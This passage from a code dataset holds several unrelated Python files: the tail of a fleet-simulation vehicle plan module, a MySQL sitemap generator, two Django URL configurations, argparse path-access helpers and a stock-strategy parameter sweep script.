i\n\n c_time = pstop.get_departure_time(c_time)\n pstop.set_planned_arrival_and_departure_time(last_c_time, c_time)\n\n if pstop.get_charging_power() > 0: # TODO # is charging now in waiting included as planned here?\n c_soc += veh_obj.compute_soc_charging(pstop.get_charging_power(), c_time - last_c_time)\n c_soc = max(c_soc, 1.0)\n pstop.set_planned_arrival_and_departure_soc(last_c_soc, c_soc)\n \n if keep_feasible and not is_feasible:\n for i, p_stop in enumerate(self.list_plan_stops):\n if i > infeasible_index:\n break\n # LOG.debug(\"LOCK because infeasible {}\".format(i))\n p_stop.set_infeasible_locked(True)\n # LOG.debug(f\"is feasible {is_feasible} | pax info {self.pax_info}\")\n # LOG.debug(\"update plan and check tt {}\".format(self))\n return is_feasible\n\n def get_dedicated_rid_list(self) -> list:\n \"\"\" returns a list of request-ids whicht are part of this vehicle plan\n :return: list of rid\n \"\"\"\n return list(self.pax_info.keys())\n\n def update_prq_hard_constraints(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, prq : PlanRequest, new_lpt : float, new_ept : float=None,\n keep_feasible : bool=False):\n \"\"\"Adapts the earliest_pickup_time_dict and latest_pickup_time_dict of the pick-up PlanStop of a request.\n\n :param veh_obj: simulation vehicle\n :param sim_time: current simulation time\n :param routing_engine: routing engine\n :param prq: PlanRequest\n :param new_lpt: new latest pick-up time constraint\n :param new_ept: new earliest pick-up time constraint, not set if None\n :param keep_feasible: optional argument to add as input in update_tt_and_check_plan\n :return: feasibility of plan\n :rtype: bool\n \"\"\"\n for ps in self.list_plan_stops:\n if prq.get_rid_struct() in ps.get_list_boarding_rids():\n ps.update_rid_boarding_time_constraints(new_latest_pickup_time=new_lpt, new_earliest_pickup_time=new_ept)\n return self.update_tt_and_check_plan(veh_obj, sim_time, routing_engine, keep_feasible=keep_feasible)\n\n def copy_and_remove_empty_planstops(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase):\n \"\"\" this function removes all plan stops from the vehicle plan that are empty\n i.e. are not locked and no pick-up/drop-offs are performes\n :param veh_obj: vehicle object\n :param sim_time: simulation time\n :param routing_engine: routing engine\n :return: vehicle plan without empty planstops\n :rtype: vehicleplan\n \"\"\"\n new_plan = self.copy()\n tmp = []\n rm = False\n for ps in new_plan.list_plan_stops:\n if not ps.is_empty() or ps.is_locked() or ps.is_locked_end():\n tmp.append(ps)\n else:\n rm = True\n if rm:\n new_plan.list_plan_stops = tmp\n new_plan.update_tt_and_check_plan(veh_obj, sim_time, routing_engine)\n return new_plan", "repo_name": "TUM-VT/FleetPy", "sub_path": "src/fleetctrl/planning/VehiclePlan.py", "file_name": "VehiclePlan.py", "file_ext": "py", "file_size_in_byte": 55852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 38, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 45, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 51, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 56, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 61, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 67, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 71, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 78, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 88, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 93, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 98, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 103, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 108, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 114, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 120, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 120, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 125, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 130, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 134, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 139, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 144, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 149, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 155, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 160, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 165, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 170, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 175, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 181, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 187, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 193, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 200, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 294, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.floor", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 369, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 404, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 519, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 519, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 541, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 541, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 541, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 610, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 610, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 631, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 631, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 631, "usage_type": "name"}, {"api_name": "src.simulation.Legs.VehicleRouteLeg", "line_number": 631, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 729, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 729, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 794, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 794, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 927, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 927, "usage_type": "name"}, {"api_name": "src.fleetctrl.planning.PlanRequest.PlanRequest", "line_number": 927, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 946, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 946, "usage_type": "name"}]}
+{"seq_id": "73700852887", "text": "#!/usr/bin/env python\n\nimport ConfigParser\nimport MySQLdb\nimport os\nimport xml.etree.ElementTree as ET\n\nfrom MySQLdb.cursors import DictCursor\n\n# Read configuration\nconfig = ConfigParser.ConfigParser()\nconfig.read(os.path.join(os.path.abspath(os.path.dirname(__file__)),\n '..', 'config', 'config.ini'))\n\nhost = config.get('prod', 'host')\ndbname = config.get('prod', 'dbname')\nusername = config.get('prod', 'username')\npassword = config.get('prod', 'password')\n\n# Connect to DB\nconnection = MySQLdb.connect(host=host, user=username,\n passwd=password, db=dbname,\n cursorclass=DictCursor)\ncursor = connection.cursor()\n\n# Get last update from home page\ncursor.execute(\"SELECT MAX(pubdate) AS last_pub FROM articles WHERE pubdate < NOW()\")\nlast_pubdate = cursor.fetchone()\n\n# Create sitemap xml root element\nsitemap = ET.Element('urlset')\nsitemap.set('xmlns', 'http://www.sitemaps.org/schemas/sitemap/0.9')\n\n# Home page is frequently changed\nurl_element = ET.SubElement(sitemap, 'url')\nloc = ET.SubElement(url_element, 'loc')\nloc.text = \"http://www.melmelboo.fr\"\nlastmod = ET.SubElement(url_element, 'lastmod')\nlastmod.text = last_pubdate[\"last_pub\"].strftime(\"%Y-%m-%d\")\nchangefreq = ET.SubElement(url_element, 'changefreq')\nchangefreq.text = 'weekly'\npriority = ET.SubElement(url_element, 'priority')\npriority.text = \"1.0\"\n\n# List all articles and add url to sitemap\ncursor.execute(\"SELECT id, url, pubdate FROM articles WHERE pubdate < NOW() ORDER BY id DESC\")\nmy_articles = cursor.fetchall()\nfor art in my_articles:\n url_element = ET.SubElement(sitemap, 'url')\n loc = ET.SubElement(url_element, 'loc')\n loc.text = \"http://www.melmelboo.fr/art-%s-%d\" % (art['url'], art['id'])\n lastmod = ET.SubElement(url_element, 'lastmod')\n lastmod.text = art['pubdate'].strftime(\"%Y-%m-%d\")\n changefreq = ET.SubElement(url_element, 'changefreq')\n changefreq.text = 'never'\n priority = ET.SubElement(url_element, 'priority')\n priority.text = \"0.8\"\n\n# List all categories and add url to sitemap\ncursor.execute(\"SELECT id, slug FROM category WHERE type=0 ORDER BY id DESC\")\nmy_categories = cursor.fetchall()\nfor cat in my_categories:\n cursor.execute(\"SELECT MAX(pubdate) AS pubdate FROM articles WHERE cat = %s AND pubdate < NOW()\", cat['id'])\n art = cursor.fetchone()\n if art['pubdate'] is None:\n continue\n url_element = ET.SubElement(sitemap, 'url')\n loc = ET.SubElement(url_element, 'loc')\n loc.text = \"http://www.melmelboo.fr/cat-%s-%d\" % (cat['slug'], cat['id'])\n lastmod = ET.SubElement(url_element, 'lastmod')\n lastmod.text = art['pubdate'].strftime(\"%Y-%m-%d\")\n changefreq = ET.SubElement(url_element, 'changefreq')\n changefreq.text = 'monthly'\n priority = ET.SubElement(url_element, 'priority')\n priority.text = \"0.5\"\n\ntree = ET.ElementTree(sitemap)\ntree.write('sitemap.xml', encoding=\"UTF-8\")\n", "repo_name": "blatinier/VoguerSurLaVague", "sub_path": "scripts/sitemap_generator.py", "file_name": "sitemap_generator.py", "file_ext": "py", "file_size_in_byte": 2944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ConfigParser.ConfigParser", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "MySQLdb.cursors.DictCursor", "line_number": 23, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 31, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 31, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 35, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 35, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 36, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 36, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 38, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 38, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 40, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 40, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 42, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 42, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 49, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 49, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 50, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 50, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 52, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 52, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 54, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 54, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 56, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 56, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 67, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 67, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 68, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 68, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 70, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 70, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 72, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 72, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 74, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 74, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ElementTree", "line_number": 77, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "15559676131", "text": "from django.conf.urls.static import static\nfrom django.urls import path\n\nfrom apps.recipes.views import (\n GetAllRecipesView,\n DetailedRecipeView,\n CreateRecipeView,\n SaveRecipeView,\n)\nfrom core import settings\n\napp_name = 'recipes'\n\nurlpatterns = [\n path('all/', GetAllRecipesView.as_view(), name='recipe-list'),\n path('item//', DetailedRecipeView.as_view(), name='recipe-detail'),\n path('create/', CreateRecipeView.as_view(), name='recipe-create'),\n path('item/download//', SaveRecipeView.as_view(), name='recipe-download'),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "repo_name": "nika-jashi/Recipe-Api", "sub_path": "apps/recipes/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.recipes.views.GetAllRecipesView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.recipes.views.GetAllRecipesView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.recipes.views.DetailedRecipeView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.recipes.views.DetailedRecipeView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.recipes.views.CreateRecipeView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "apps.recipes.views.CreateRecipeView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.recipes.views.SaveRecipeView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.recipes.views.SaveRecipeView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "core.settings.MEDIA_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "core.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "core.settings.MEDIA_ROOT", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "5693520169", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n\n # the BookListView has a different format from the index view because it'll be implemented as a class. It will inherit from an existing generic view function that already does most of what we want this view function to do, rather than writing our own from scratch. For Django class-based views we access an appropriate view function by calling the class method as_view(). This does all the work of creating an instance of the class, and making sure that the right handler methods are called for incoming HTTP requests.\n path('books/', views.BookListView.as_view(), name='books'),\n \n # The generic class-based detail view expects to be passed a parameter named pk. If you're writing your own function view you can use whatever parameter name you like, or indeed pass the information in an unnamed argument.\n path('book/', views.BookDetailView.as_view(), name='book-detail'),\n\n path('authors/', views.AuthorListView.as_view(), name='authors'),\n path('author/', views.AuthorDetailView.as_view(), name='author-detail'),\n path('mybooks/', views.LoanedBooksByUserListView.as_view(), name='my-borrowed'),\n path('book//renew/', views.renew_book_librarian, name='renew-book-librarian'),\n]", "repo_name": "activus-d/MDN-locallibrary-app", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1340, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "72195593367", "text": "import argparse\nimport enum\nimport functools\nimport operator\nimport os\nimport pathlib\n\n\nclass ChoiceMapping(argparse.Action):\n \"\"\"Argparse Action to interpret the `choices` argument as a\n mapping of user-specified choices values to the resulting option\n values.\n\n \"\"\"\n def __init__(self, *args, choices, **kwargs):\n super().__init__(*args, choices=choices.keys(), **kwargs)\n self.mapping = choices\n\n def __call__(self, parser, namespace, value, option_string=None):\n setattr(namespace, self.dest, self.mapping[value])\n\n\ndef access_parent(path):\n access_target = path\n\n # Path.exists() calls stat() which can raise PermissionError (prematurely)\n while not os.path.exists(access_target) and access_target.name != '':\n access_target = access_target.parent\n\n return access_target\n\n\nclass PathAccess:\n \"\"\"Argparse type ensuring filesystem access to given path argument.\n\n An instance of pathlib.Path is returned.\n\n \"\"\"\n class Access(enum.IntFlag):\n\n r = os.R_OK\n w = os.W_OK\n\n @property\n def mode(self):\n #\n # note: enum has various internal means of determining contents of\n # a composite flag until proper instance iteration lands in 3.11 or\n # so.\n #\n # rather than worrying about that, here we determine contained names\n # manually. in 3.11 should be even simpler.\n #\n return ''.join(member.name for member in self.__class__ if member in self)\n\n def ok(self, path):\n return os.access(path, self)\n\n class PathAccessError(argparse.ArgumentTypeError):\n \"\"\"Subclass of ArgumentTypeError raised when path permissions\n do not match specified mode.\n\n \"\"\"\n\n def __init__(self, mode, parents=False):\n if isinstance(mode, str):\n self.access = functools.reduce(operator.or_, (self.Access[part] for part in mode))\n elif isinstance(mode, int):\n self.access = self.Access(mode)\n elif isinstance(mode, self.Access):\n self.access = mode\n else:\n raise TypeError('expected access mode of type str, int or Access '\n 'not ' + mode.__class__.__name__)\n\n self.parents = parents\n\n def __call__(self, value):\n path = pathlib.Path(value)\n\n access_target = access_parent(path) if self.parents else path\n\n if not self.access.ok(access_target):\n raise self.PathAccessError(\"failed to access path with mode \"\n f\"{self.access.mode}: {path}\")\n\n return path\n\n\nclass PathTypeError(argparse.ArgumentTypeError):\n \"\"\"Subclass of ArgumentTypeError raised for path of incorrect type.\"\"\"\n\n\nclass FileAccess(PathAccess):\n\n PathTypeError = PathTypeError\n\n def __call__(self, value):\n path = super().__call__(value)\n\n if self.parents and not path.exists():\n if not access_parent(path).is_dir():\n raise self.PathTypeError(f\"path inaccessible: {path}\")\n elif not path.is_file():\n raise self.PathTypeError(f\"path must be file: {path}\")\n\n return path\n\n\nclass DirAccess(PathAccess):\n\n PathTypeError = PathTypeError\n\n def __call__(self, value):\n path = super().__call__(value)\n\n if self.parents and not path.exists():\n if not access_parent(path).is_dir():\n raise self.PathTypeError(f\"path inaccessible: {path}\")\n elif not path.is_dir():\n raise self.PathTypeError(f\"path must be directory: {path}\")\n\n return path\n", "repo_name": "internet-equity/fate", "sub_path": "src/fate/util/argument.py", "file_name": "argument.py", "file_ext": "py", "file_size_in_byte": 3636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.Action", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "enum.IntFlag", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.W_OK", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 57, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 59, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 67, "usage_type": "call"}, {"api_name": "operator.or_", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 79, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 90, "usage_type": "attribute"}]}
+{"seq_id": "2612445285", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nalpaca_marker_data --> param_sweep \n (do only once) | |\n | uses | \n | these | \n |classes|\n V V\n heuristics ---> moneyManager\n \n \n \n \n\"\"\"\n\n\n#This script will take my custom built class and load data into it\n#Similar to data_loader, but instead of primarily being for visualization, here we do parameter sweeps\n#Some general sweeps we will do:\n# -different long/recent averages combinations\n# -threshold values for buying/selling\n# -stock markers\n\n#Anything more in depth than the above (such as approaches with regards to variable-sized stock buys)\n#should really be handled by the data_loader, which allows for more visualization\n\n\n\n\nimport config\n \nimport alpaca_trade_api as tradeapi\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\nfrom heuristics import StockPredictor\nfrom moneyManager import BankAccount\n\nimport os, datetime\nimport time\n\n#~~~Load in the data before sweep loops~~~\n# f = open('test_data/stockdata_7_27.pckl', 'rb')\nf = open('test_data/stockdata_9_19.pckl', 'rb')\nfullData = pickle.load(f)\nf.close()\n\n\n#~~~Create lists by which the sweeps will occur~~~\n##Sweep 1: --> go low on thesholds and average time\n#sweepList_recT = [10/460, 50/460, 100/460, 300/460]\n#sweepList_avgT = [int(1), int(2), int(4), int(7)]\n#sweepList_thresh = [0.05, 0.1, 0.25, 0.5, 1]\n\n##Sweep 2:\n#numMin = 331.246\n#temp = list(range(10))\n#sweepList_recT = [(i*8 + 5)/numMin for i in temp]\n#sweepList_avgT = [0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.6, 1.8, 2.0, 2.2, 2.4, 2.6] \n#sweepList_thresh = [0.02, 0.04, 0.5, 0.06, 0.08, 0.1]\n\n#Sweep 3:\nnumMin = 331.246\ntemp = list(range(10))\n#sweepList_recT = [(i*6 + 5)/numMin for i in temp]\nsweepList_recT = [0.08,0.10,0.12,0.14,0.16,0.18]\n#sweepList_avgT = [2, 2.5, 3, 3.5, 4, 4.5, 5] \nsweepList_avgT = [2] \n#sweepList_thresh = [0.01, 0.015, 0.02]\nsweepList_thresh = [0.05,0.01,0.015,0.02]\n\nsweepList_deltaThresh = [0,0.1,0.25,0.5,0.75,1,1.25,1.5,1.75,2] #Define as a portion of the nominal threshold\n\n\nparamNum = len(sweepList_avgT)*len(sweepList_recT)*len(sweepList_thresh)*len(sweepList_deltaThresh)\n\n\nprint('We will be running through ' + str(paramNum) + ' parameters')\ntime.sleep(1)\n\n\n\n#~~~INITIALIZE STOCK PREDICTOR CLASS ~~~\nmySP = StockPredictor('invmean', 'data')\nmySP.data_loader(fullData['SPY'][:,np.r_[0:2, -1]])\n# mySP.data_loader(fullData['TSLA'][:,np.r_[0:2, -1]])\n#mySP.data_loader(fullData['AAPL'][:,np.r_[0:2, -1]])\n\n\n#~~~INITIALIZE BANK MANAGMENT CLASS ~~~\nrefBank = BankAccount(cashPool = 10e3, tradStrat = 'simple_heur', \\\n heuristic = mySP)\n \n\n\n#~~~Param for loop sweep time ~~~\n#evertime we change parameters, reset sweet param variables for the class, and rerun the predict function\nparamList = [] #append calculated parameters here\ndataList = [] #store heursitic results here (big list here)\niTrack = 0\nfor curr_recT in sweepList_recT:\n for curr_avgT in sweepList_avgT:\n for curr_thresh in sweepList_thresh:\n for curr_delta in sweepList_deltaThresh:\n iTrack += 1\n print('Currently on sweep...' + str(iTrack))\n \n #reject this combination of parameters if avgT is smaller than recT...\n if curr_avgT <= curr_recT:\n continue\n \n mySP.sweepParam_avgT = curr_avgT\n mySP.sweepParam_recT = curr_recT\n mySP.sweepParam_thresh = curr_thresh\n mySP.sweepParam_deltaThresh = curr_delta \n \n #rerun predictors for heuristics/money manager objects\n mySP.predictor()\n simpheurT, simpheurData, debugArr, cashArr, stockArr = refBank.timeLapse()\n \n #append to the tracking lists\n paramList.append((curr_avgT, curr_recT, curr_thresh, curr_delta))\n dataList.append((simpheurT, simpheurData))\n \n \n \n#~~~Sort the last values of the hueristic outputs, print the best 5 param combos~~~\ntopNum = 5\nlastValList = [i[1][-1] for i in dataList]\nsortedVals = sorted(lastValList)\ntopNList = []\n\nfor i in range(topNum):\n topIdx = lastValList.index(sortedVals[-1-i])\n topNList.append(topIdx)\n \n#Print the params\nfor i, val in enumerate(topNList):\n print('Rank ' + str(i) + ': ')\n print('Average Time: ' + str(paramList[val][0]))\n print('Recent Time: ' + str(paramList[val][1]))\n print('Threshold: ' + str(paramList[val][2]))\n print('Threshold Delta: ' + str(paramList[val][3]))\n print()\n \n\n \n \n\n\n#~~~Plot the loop results~~~\nplt.figure(1)\nfor i in range(paramNum):\n currData = dataList[i]\n plt.plot(currData[0], currData[1])\n plt.grid()\n plt.title('Parameter Sweep Comparison Graph')\n \n#plot the top N results with labels \nlegendList = [] \nplt.figure(2)\nfor i, val in enumerate(topNList):\n currData = dataList[val]\n plt.plot(currData[0], currData[1])\n \n legendStr = 'Rank=' + str(i) + ', avgT=' + str(paramList[val][0]) + \\\n ', recT=' + \"{:.2f}\".format(paramList[val][1]) + ', thresh=' + str(paramList[val][2]) + \\\n ', dThresh=' + str(paramList[val][3])\n legendList.append(legendStr)\nplt.grid()\nplt.title('Best ' + str(topNum) + ' Parameter Combos')\nplt.legend(legendList)\n \n \n ", "repo_name": "michaele77/trading_bot", "sub_path": "param_sweep.py", "file_name": "param_sweep.py", "file_ext": "py", "file_size_in_byte": 5619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pickle.load", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "heuristics.StockPredictor", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 88, "usage_type": "attribute"}, {"api_name": "moneyManager.BankAccount", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}]}
